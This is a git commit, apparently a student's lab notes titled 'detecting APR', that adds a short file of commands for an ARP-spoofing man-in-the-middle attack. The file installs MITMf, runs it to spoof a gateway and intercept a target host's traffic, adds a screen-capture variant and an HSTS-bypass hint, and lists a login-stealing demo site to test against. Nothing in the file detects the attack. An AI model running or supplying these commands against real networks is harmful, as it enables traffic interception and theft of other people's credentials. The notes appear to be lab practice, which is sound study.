detecting APR

This commit is contained in:
Frank Xu
2018-12-07 20:09:50 -05:00
parent ed59912771
commit 41b9c4c3e3
5 changed files with 14 additions and 0 deletions

View File

@@ -0,0 +1,14 @@
arp -a //router's ip
//install mitmf
apt-get update
apt-get install mitmf -y
//attack
mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0
mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0 --screen
//-hsts
//Website
http://www.stealmylogin.com/demo.html
http://w3schools.invisionzone.com/